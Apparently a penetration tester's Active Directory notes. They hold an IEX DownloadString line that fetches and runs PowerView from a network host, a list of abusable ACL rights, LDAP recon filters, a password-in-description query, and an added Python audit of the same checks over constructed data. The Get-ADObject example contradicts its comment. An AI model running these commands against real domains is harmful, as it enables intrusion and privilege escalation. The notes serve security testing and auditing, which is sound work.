Global Group memberships *Domain Users *PswReaders
# import PowerView into the current session
IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/powerview.ps1')
# query the target objects' attributes (Get-ADObject takes a distinguished name, GUID or SID as -Identity)
Get-ADObject <hostname1>,<hostname2>
Object Access Control List (ACL)
GenericAll --> Full permission on object
GenericWrite --> Edit certain attributes on the object
WriteOwner --> Change ownership of the object
WriteDACL --> Edit ACEs applied to object
AllExtendedRights --> Change password, reset password, etc.
ForceChangePassword --> Password change for object
Self (Self-Membership) --> Add ourselves to an object, for example a group
LDAP RECON
================
# look at all domain controllers (primary group RID 516 = Domain Controllers)
(primaryGroupID=516)
# look at all domain admins
(&(objectCategory=person)(objectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=TEST,DC=local))
# accounts trusted for unconstrained delegation (userAccountControl bit 0x80000, bitwise AND matching rule)
(userAccountControl:1.2.840.113556.1.4.803:=524288)
Using PowerShell
# find accounts whose description attribute mentions a password
Import-Module ActiveDirectory
Get-ADObject -LDAPFilter "(&(objectClass=user)(description=*pass*))" -Properties * | Select-Object SAMAccountName, Description, DistinguishedName
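The same three checks (unconstrained delegation, passwords in description, risky ACEs from the list above) as an offline audit over an exported directory snapshot; this is an added example, not part of the original notes, and the export format and sample records are constructed for illustration.

```python
import re

# userAccountControl bits (MS-ADTS); 0x80000 is the 524288 the LDAP filter tests.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",   # unconstrained delegation
}
DC_PRIMARY_GROUP_RID = 516              # Domain Controllers group
# ACE rights from the ACL list above; any of them held by a non-admin principal is a finding.
RISKY_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDACL",
                "AllExtendedRights", "ForceChangePassword", "Self"}
PASSWORD_HINT = re.compile(r"pass|pwd", re.IGNORECASE)

def decode_uac(value):
    """Return the names of the set userAccountControl bits we track."""
    return [name for bit, name in UAC_FLAGS.items() if value & bit]

def audit(objects, aces, trusted_principals):
    """Flag the conditions the LDAP/PowerShell recon queries above look for."""
    findings = []
    for obj in objects:
        name = obj["sAMAccountName"]
        flags = decode_uac(obj.get("userAccountControl", 0))
        # DCs are expected to carry the delegation bit; anything else is suspicious
        if "TRUSTED_FOR_DELEGATION" in flags and obj.get("primaryGroupID") != DC_PRIMARY_GROUP_RID:
            findings.append((name, "unconstrained delegation on non-DC"))
        if PASSWORD_HINT.search(obj.get("description", "")):
            findings.append((name, "possible password in description"))
    for ace in aces:
        if ace["right"] in RISKY_RIGHTS and ace["principal"] not in trusted_principals:
            findings.append((ace["target"], f"{ace['principal']} has {ace['right']}"))
    return findings

# Constructed sample export (hypothetical objects, not real directory data).
SAMPLE_OBJECTS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000, "primaryGroupID": 516},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x90200,
     "description": "backup svc, password set by helpdesk"},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x10200, "description": "Helpdesk"},
]
SAMPLE_ACES = [
    {"target": "Domain Admins", "principal": "Domain Admins", "right": "GenericAll"},
    {"target": "Domain Admins", "principal": "PswReaders", "right": "WriteDACL"},
]
TRUSTED = {"Domain Admins", "Enterprise Admins", "SYSTEM"}

if __name__ == "__main__":
    for target, issue in audit(SAMPLE_OBJECTS, SAMPLE_ACES, TRUSTED):
        print(f"{target}: {issue}")
```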
Have user & pass for an SVC account?
Sometimes service accounts indicate a ticket possibility:
Don't miss this check: